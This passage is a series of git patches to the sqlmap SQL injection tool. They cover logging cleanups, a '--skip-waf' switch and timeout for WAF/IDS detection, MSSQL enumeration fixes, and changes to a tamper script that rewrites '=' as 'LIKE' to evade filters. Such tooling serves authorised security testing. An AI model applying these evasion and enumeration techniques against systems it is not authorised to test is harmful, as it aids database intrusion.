27/92] Update for #1414 --- lib/utils/api.py | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/lib/utils/api.py b/lib/utils/api.py index 09aac2c5a..d8a38bf1e 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -661,7 +661,7 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): def _client(url, options=None): - logger.debug("Calling " + url) + logger.debug("Calling %s" % url) try: data = None if options is not None: @@ -671,7 +671,7 @@ def _client(url, options=None): text = response.read() except: if options: - logger.error("Failed to load and parse " + url) + logger.error("Failed to load and parse %s" % url) raise return text @@ -707,10 +707,10 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): if not taskid: logger.error("No task ID in use") continue - raw = _client(addr + "/scan/" + taskid + "/" + command) + raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) res = dejsonize(raw) if not res["success"]: - logger.error("Failed to execute command " + command) + logger.error("Failed to execute command %s" % command) dataToStdout("%s\n" % raw) elif command.startswith("new"): @@ -730,7 +730,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): if cmdLineOptions[key] is None: del cmdLineOptions[key] - raw = _client(addr + "/task/new") + raw = _client("%s/task/new" % addr) res = dejsonize(raw) if not res["success"]: logger.error("Failed to create new task") @@ -738,7 +738,7 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): taskid = res["taskid"] logger.info("New task ID is '%s'" % taskid) - raw = _client(addr + "/scan/" + taskid + "/start", cmdLineOptions) + raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) res = dejsonize(raw) if not res["success"]: logger.error("Failed to start scan") @@ -758,10 +758,12 @@ def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): logger.info("Switching to task ID '%s' " % taskid) elif command in ("list", "flush"): - 
raw = _client(addr + "/admin/0/" + command) + raw = _client("%s/admin/%s/%s" % (addr, taskid or 0, command)) res = dejsonize(raw) if not res["success"]: - logger.error("Failed to execute command " + command) + logger.error("Failed to execute command %s" % command) + elif command == "flush": + taskid = None dataToStdout("%s\n" % raw) elif command in ("exit", "bye", "quit", 'q'): From 27707be467da0a947ce4f33ec655b8cbf64c9f89 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 17 Sep 2015 17:09:36 +0200 Subject: [PATCH 28/92] Fixes #1416 --- lib/request/connect.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/request/connect.py b/lib/request/connect.py index fe7c4cd23..a49bba0a3 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1053,9 +1053,9 @@ class Connect(object): _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) finally: kb.pageCompress = popValue() From f96edc951cdd159b7221603db3555622718fe284 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 11:02:56 +0200 Subject: [PATCH 29/92] Patches #1419 --- plugins/dbms/mssqlserver/enumeration.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 
a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index 9ea67eff9..a16e7a228 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -336,7 +336,7 @@ class Enumeration(GenericEnumeration): values = [values] for foundTbl in values: - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbl = safeSQLIdentificatorNaming(unArrayizeValue(foundTbl), True) if foundTbl is None: continue From 3fca379f2905bc4d20c558b2299aa000b3d8e9f2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 11:25:59 +0200 Subject: [PATCH 30/92] Minor patch (avoiding message 'can't establish SSL connection' in --check-tor) --- lib/core/option.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/lib/core/option.py b/lib/core/option.py index e2157806a..060043aa8 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2244,7 +2244,11 @@ def _checkTor(): infoMsg = "checking Tor connection" logger.info(infoMsg) - page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + try: + page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False) + except SqlmapConnectionException: + page = None + if not page or 'Congratulations' not in page: errMsg = "it seems that Tor is not properly set. 
Please try using options '--tor-type' and/or '--tor-port'" raise SqlmapConnectionException(errMsg) From 56f0b811a6f52623fd08cf0aee149f76ba7baf36 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 13:23:56 +0200 Subject: [PATCH 31/92] Minor patch --- lib/controller/checks.py | 10 ++++++++++ lib/core/settings.py | 3 +++ 2 files changed, 13 insertions(+) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 2cb131ad3..bb2d62d6c 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -39,6 +39,7 @@ from lib.core.common import singleTimeWarnMessage from lib.core.common import urlencode from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError +from lib.core.defaults import defaults from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -68,6 +69,7 @@ from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import UPPER_RATIO_BOUND from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.settings import IDS_WAF_CHECK_RATIO +from lib.core.settings import IDS_WAF_CHECK_TIMEOUT from lib.core.threads import getCurrentThreadData from lib.request.connect import Connect as Request from lib.request.inject import checkBooleanExpression @@ -1153,12 +1155,16 @@ def checkWaf(): value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload)) + pushValue(conf.timeout) + conf.timeout = IDS_WAF_CHECK_TIMEOUT + try: retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO except SqlmapConnectionException: retVal = True finally: kb.matchRatio = None + conf.timeout = popValue() if retVal: warnMsg = "heuristics detected that the target " @@ -1173,6 +1179,10 @@ def checkWaf(): if output and output[0] in ("Y", "y"): conf.identifyWaf = 
True + if conf.timeout == defaults.timeout: + logger.warning("dropping timeout to 5 seconds (i.e. '--timeout=5')") + conf.timeout = 5 + return retVal def identifyWaf(): diff --git a/lib/core/settings.py b/lib/core/settings.py index 303c10cf4..c18eb57dd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -42,6 +42,9 @@ CONSTANT_RATIO = 0.9 # Ratio used in heuristic check for WAF/IDS/IPS protected targets IDS_WAF_CHECK_RATIO = 0.5 +# Timeout used in heuristic check for WAF/IDS/IPS protected targets +IDS_WAF_CHECK_TIMEOUT = 10 + # Lower and upper values for match ratio in case of stable page LOWER_RATIO_BOUND = 0.02 UPPER_RATIO_BOUND = 0.98 From e81e47464666f65daf8eb9a1dca6e3a517b9894c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 14:46:34 +0200 Subject: [PATCH 32/92] Minor adjustment --- lib/controller/checks.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index bb2d62d6c..ea3dc618d 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1180,8 +1180,8 @@ def checkWaf(): conf.identifyWaf = True if conf.timeout == defaults.timeout: - logger.warning("dropping timeout to 5 seconds (i.e. '--timeout=5')") - conf.timeout = 5 + logger.warning("dropping timeout to %d seconds (i.e. 
'--timeout=%d')" % (IDS_WAF_CHECK_TIMEOUT, IDS_WAF_CHECK_TIMEOUT)) + conf.timeout = IDS_WAF_CHECK_TIMEOUT return retVal From 81caf14b6dc727ef87b317d37c3ab7f07ac29bfe Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 14:57:44 +0200 Subject: [PATCH 33/92] Adding switch --skip-waf --- lib/controller/checks.py | 8 ++++---- lib/core/option.py | 4 ++++ lib/core/optiondict.py | 1 + lib/parse/cmdline.py | 4 ++++ sqlmap.conf | 4 ++++ 5 files changed, 17 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index ea3dc618d..eac95629e 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1142,12 +1142,12 @@ def checkWaf(): Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse """ - if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline)): + if any((conf.string, conf.notString, conf.regexp, conf.dummy, conf.offline, conf.skipWaf)): return None - dbmMsg = "heuristically checking if the target is protected by " - dbmMsg += "some kind of WAF/IPS/IDS" - logger.debug(dbmMsg) + infoMsg = "checking if the target is protected by " + infoMsg += "some kind of WAF/IPS/IDS" + logger.info(infoMsg) retVal = False payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) diff --git a/lib/core/option.py b/lib/core/option.py index 060043aa8..6eb4433a5 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2295,6 +2295,10 @@ def _basicOptionValidation(): errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) + if conf.identifyWaf and conf.skipWaf: + errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" + raise SqlmapSyntaxException(errMsg) + if conf.titles and conf.nullConnection: errMsg = "switch '--titles' is incompatible with switch '--null-connection'" raise SqlmapSyntaxException(errMsg) diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index 0445ccb09..3ff1ded01 100644 --- 
a/lib/core/optiondict.py +++ b/lib/core/optiondict.py @@ -231,6 +231,7 @@ optDict = { "cpuThrottle": "integer", "forceDns": "boolean", "identifyWaf": "boolean", + "skipWaf": "boolean", "ignore401": "boolean", "smokeTest": "boolean", "liveTest": "boolean", diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index bd06c1867..6d417fc21 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -713,6 +713,10 @@ def cmdLineParser(argv=None): action="store_true", help="Make a thorough testing for a WAF/IPS/IDS protection") + miscellaneous.add_option("--skip-waf", dest="skipWaf", + action="store_true", + help="Skip heuristic detection of WAF/IPS/IDS protection") + miscellaneous.add_option("--mobile", dest="mobile", action="store_true", help="Imitate smartphone through HTTP User-Agent header") diff --git a/sqlmap.conf b/sqlmap.conf index d7db6c376..c18159375 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -750,6 +750,10 @@ googlePage = 1 # Valid: True or False identifyWaf = False +# Skip heuristic detection of WAF/IPS/IDS protection. +# Valid: True or False +skipWaf = False + # Imitate smartphone through HTTP User-Agent header. 
# Valid: True or False mobile = False From 0e22a0ca5f901c721a50fbea7c7bde2f2cbbb213 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 21 Sep 2015 16:41:54 +0200 Subject: [PATCH 34/92] Minor cosmetics --- lib/core/dump.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/core/dump.py b/lib/core/dump.py index a4ff91913..03caf233b 100644 --- a/lib/core/dump.py +++ b/lib/core/dump.py @@ -636,11 +636,11 @@ class Dump(object): for column in dbColumnsDict.keys(): if colConsider == "1": - colConsiderStr = "s like '%s' were" % unsafeSQLIdentificatorNaming(column) + colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column) else: colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column) - msg = "Column%s found in the " % colConsiderStr + msg = "column%s found in the " % colConsiderStr msg += "following databases:" self._write(msg) From 74294ae105b2af02fc0713513e45f71290b20563 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 11:28:56 +0200 Subject: [PATCH 35/92] Bug fix for --common-tables in case of MsSQL/Sybase (safeSQLIdentificatorNaming already used) --- lib/techniques/brute/use.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/techniques/brute/use.py b/lib/techniques/brute/use.py index 4a1594590..5c25cdf7d 100644 --- a/lib/techniques/brute/use.py +++ b/lib/techniques/brute/use.py @@ -28,9 +28,9 @@ from lib.core.enums import HASHDB_KEYS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.settings import METADB_SUFFIX from lib.core.settings import BRUTE_COLUMN_EXISTS_TEMPLATE from lib.core.settings import BRUTE_TABLE_EXISTS_TEMPLATE +from lib.core.settings import METADB_SUFFIX from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request import inject @@ -102,7 +102,7 @@ def tableExists(tableFile, 
regex=None): break if conf.db and METADB_SUFFIX not in conf.db and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): - fullTableName = "%s%s%s" % (conf.db, '..' if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) else '.', table) + fullTableName = "%s.%s" % (conf.db, table) else: fullTableName = table From 03da24b24961c92f44a62ae37753c66e83873485 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 12:03:47 +0200 Subject: [PATCH 36/92] Minor cosmetics --- plugins/generic/databases.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 7c671c92e..f76bafa9b 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -509,7 +509,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) @@ -604,7 +604,7 @@ class Databases: if len(colList) > 0: if colTuple: _, colCondParam = colTuple - infoMsg += "like '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) + infoMsg += "LIKE '%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join(unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) From 058f63a0506f072b3e36b3a6e106fb2c429edc17 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 12:33:11 +0200 Subject: [PATCH 37/92] Patch for annoying retrieval of columns during dump (if -C used) --- plugins/generic/databases.py | 54 +++++++++++++++++++++--------------- plugins/generic/entries.py | 2 +- 2 files changed, 32 insertions(+), 24 deletions(-) 
diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index f76bafa9b..455403cc4 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -370,7 +370,7 @@ class Databases: return kb.data.cachedTables - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -517,10 +517,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -534,7 +530,14 @@ class Databases: elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.inband.query % tbl - values = inject.getValue(query, blind=False, time=False) + if dumpMode and colList: + values = [(_,) for _ in colList] + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] @@ -612,10 +615,6 @@ class Databases: condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join(condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - if 
Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.count % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery @@ -639,22 +638,31 @@ class Databases: parseSqliteTableSchema(value) return kb.data.cachedColumns - count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - table = {} columns = {} - if not isNumPosStrValue(count): - if Backend.isDbms(DBMS.MSSQL): - count, index, values = 0, 1, [] - while True: - query = rootQuery.blind.query3 % (conf.db, tbl, index) - value = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if isNoneValue(value) or value == " ": - break - else: - columns[safeSQLIdentificatorNaming(value)] = None - index += 1 + if dumpMode and colList: + count = 0 + for value in colList: + columns[safeSQLIdentificatorNaming(value)] = None + else: + infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.info(infoMsg) + + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if not isNumPosStrValue(count): + if Backend.isDbms(DBMS.MSSQL): + count, index, values = 0, 1, [] + while True: + query = rootQuery.blind.query3 % (conf.db, tbl, index) + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + if isNoneValue(value) or value == " ": + break + else: + columns[safeSQLIdentificatorNaming(value)] = None + index += 1 if not columns: errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 1d9e770b7..dcfe3f4f5 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -103,7 +103,7 @@ class Entries: if foundData is None: kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True) + 
self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData From 158ae501c14009b661fd66bd398ddc70c8933a2b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 22 Sep 2015 14:32:52 +0200 Subject: [PATCH 38/92] Bug fix for tamper script equaltolike (has been doing problems when used with MsSQL) --- tamper/equaltolike.py | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index d9ccf0082..51ce4c5ea 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -35,15 +35,10 @@ def tamper(payload, **kwargs): 'SELECT * FROM users WHERE id LIKE 1' """ - def process(match): - word = match.group() - word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "") - - return word - retVal = payload if payload: - retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal) + for regex, subst in ((r"\s+=\s+", " LIKE "), (r"\s+=", " LIKE"), (r"=\s+", "LIKE ")): + retVal = re.sub(regex, subst, retVal) return retVal From aa088aafd2b8198af0e509d99b2cb0465b0fab8c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 23 Sep 2015 08:47:52 +0200 Subject: [PATCH 39/92] Looks more technical --- plugins/dbms/mssqlserver/enumeration.py | 12 ++++++------ plugins/generic/search.py | 26 ++++++++++++------------- 2 files changed, 19 insertions(+), 19 deletions(-) diff --git a/plugins/dbms/mssqlserver/enumeration.py b/plugins/dbms/mssqlserver/enumeration.py index a16e7a228..0aa86ae32 100644 --- a/plugins/dbms/mssqlserver/enumeration.py +++ b/plugins/dbms/mssqlserver/enumeration.py @@ -184,7 +184,7 @@ class Enumeration(GenericEnumeration): infoMsg = "searching table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -217,7 +217,7 @@ class Enumeration(GenericEnumeration): else: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + 
infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -229,7 +229,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -295,7 +295,7 @@ class Enumeration(GenericEnumeration): infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} @@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (column, db) logger.info("%s%s" % (infoMsg, infoMsgTbl)) @@ -380,7 +380,7 @@ class Enumeration(GenericEnumeration): if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % column warnMsg += "in database '%s'" % db logger.warn(warnMsg) diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 1a4a5b02b..0069a1af3 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -65,7 +65,7 @@ class Search: infoMsg = "searching database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -98,7 +98,7 @@ class Search: if not values and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -113,7 +113,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no database" if 
dbConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -172,7 +172,7 @@ class Search: infoMsg = "searching table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) if dbCond and conf.db and conf.db != CURRENT_DB: @@ -225,7 +225,7 @@ class Search: if len(whereDbsQuery) == 0: infoMsg = "fetching number of databases with table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -236,7 +236,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no databases have table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.warn(warnMsg) @@ -274,7 +274,7 @@ class Search: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -288,7 +288,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -390,7 +390,7 @@ class Search: infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} @@ -468,7 +468,7 @@ class Search: if not conf.db: infoMsg = "fetching number of databases with tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) @@ -479,7 +479,7 @@ class Search: if not 
isNumPosStrValue(count): warnMsg = "no databases have tables containing column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.warn("%s%s" % (warnMsg, infoMsgTbl)) @@ -519,7 +519,7 @@ class Search: infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -533,7 +533,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) From 29bdcf0e651cb30277c2497a3c5994b2c93419e5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 23 Sep 2015 15:31:25 +0200 Subject: [PATCH 40/92] Fixes #1425 --- thirdparty/multipart/multipartpost.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/thirdparty/multipart/multipartpost.py b/thirdparty/multipart/multipartpost.py index e9aa1a85e..07a6e4e71 100644 --- a/thirdparty/multipart/multipartpost.py +++ b/thirdparty/multipart/multipartpost.py @@ -73,7 +73,7 @@ class MultipartPostHandler(urllib2.BaseHandler): request.add_data(data) return request - def multipart_encode(vars, files, boundary = None, buf = None): + def multipart_encode(vars, files, boundary=None, buf=None): if boundary is None: boundary = mimetools.choose_boundary() @@ -100,7 +100,7 @@ class MultipartPostHandler(urllib2.BaseHandler): # buf += 'Content-Length: %s\r\n' % file_size fd.seek(0) - buf = str(buf) + buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8") buf += '\r\n%s\r\n' % fd.read() buf += '--%s--\r\n\r\n' % boundary From 12b9939baaaa8b8b976da431cffdce7a63bc230e Mon Sep 17 00:00:00 2001 From: Miroslav 
Stampar Date: Thu, 24 Sep 2015 10:24:37 +0200 Subject: [PATCH 41/92] Minor refactoring --- tamper/equaltolike.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index 51ce4c5ea..05615355b 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -38,7 +38,6 @@ def tamper(payload, **kwargs): retVal = payload if payload: - for regex, subst in ((r"\s+=\s+", " LIKE "), (r"\s+=", " LIKE"), (r"=\s+", "LIKE ")): - retVal = re.sub(regex, subst, retVal) + retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal From e19b097ab55ff66ba30194d38fec00cd0d10bcdc Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 24 Sep 2015 11:49:05 +0200 Subject: [PATCH 42/92] Bug fix (--columns has been broken for last couple of days) --- plugins/generic/databases.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 455403cc4..dba018808 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -664,12 +664,12 @@ class Databases: columns[safeSQLIdentificatorNaming(value)] = None index += 1 - if not columns: - errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") - errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.error(errMsg) - continue + if not columns: + errMsg = "unable to retrieve the %scolumns " % ("number of " if not Backend.isDbms(DBMS.MSSQL) else "") + errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) + errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.error(errMsg) + continue for index in getLimitRange(count): if 